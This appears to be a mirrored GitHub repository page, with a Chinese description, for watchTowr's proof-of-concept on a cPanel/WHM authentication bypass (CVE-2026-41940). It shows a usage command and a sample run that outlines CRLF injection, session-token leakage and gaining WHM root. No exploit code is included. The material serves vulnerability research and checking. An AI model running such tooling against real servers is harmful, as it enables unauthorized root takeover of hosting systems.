watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

GitHub: watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

针对 cPanel/WHM 身份验证绕过漏洞(CVE-2026-41940)的概念验证利用工具,通过 CRLF 注入绕过认证并获取 WHM root 权限实现远程代码执行。

Stars: 198 | Forks: 45

# cve-2026-41940 cPanel/WHM 身份验证绕过 - 检测特征生成器 cPanel/WHM 身份验证绕过检测特征生成工具 # 描述 此检测特征生成器用于验证 cPanel/WHM 是否存在[近期](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026)披露的身份验证绕过漏洞。 # 实战检测 针对易受攻击的实例进行测试: ``` python authbypass-RCE.py --target https://target:2087/ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py (*) cPanel/WHM Authentication Bypass - Detection Artifact Generator - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber) CVEs: [CVE-2026-Pending] [0] hostname = [1] minting a preauth session... session base = :vQ2WC5Bexp0oFSa7 [2] sending the CRLF injection (Basic auth + no-ob cookie)... HTTP 307, leaked token = /cpsess5691070609 [3] firing do_token_denied to propagate raw -> cache... HTTP 401, gadget fired [4] verifying we're WHM root... /json-api/version -> HTTP 200 {"version":"11.110.0.89"} ``` # 受影响版本 请参阅 cPanel 官方网站[此处](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026) # 关注 [watchTowr](https://watchTowr.com) Labs 获取最新的安全研究,请关注 [watchTowr](https://watchTowr.com) Labs 团队 - https://labs.watchtowr.com/ - https://x.com/watchtowrcyber
标签:CISA项目, cPanel, CRLF注入, CVE-2026-41940, PoC, Python, RCE, WHM, 会话伪造, 会话劫持, 安全测试, 控制面板安全, 攻击性安全, 攻击模拟, 数据展示, 无后门, 暴力破解, 红队, 编程工具, 认证绕过, 身份验证漏洞, 身份验证绕过, 身份验证绕过检测, 远程代码执行, 逆向工具, 预认证漏洞, 驱动签名利用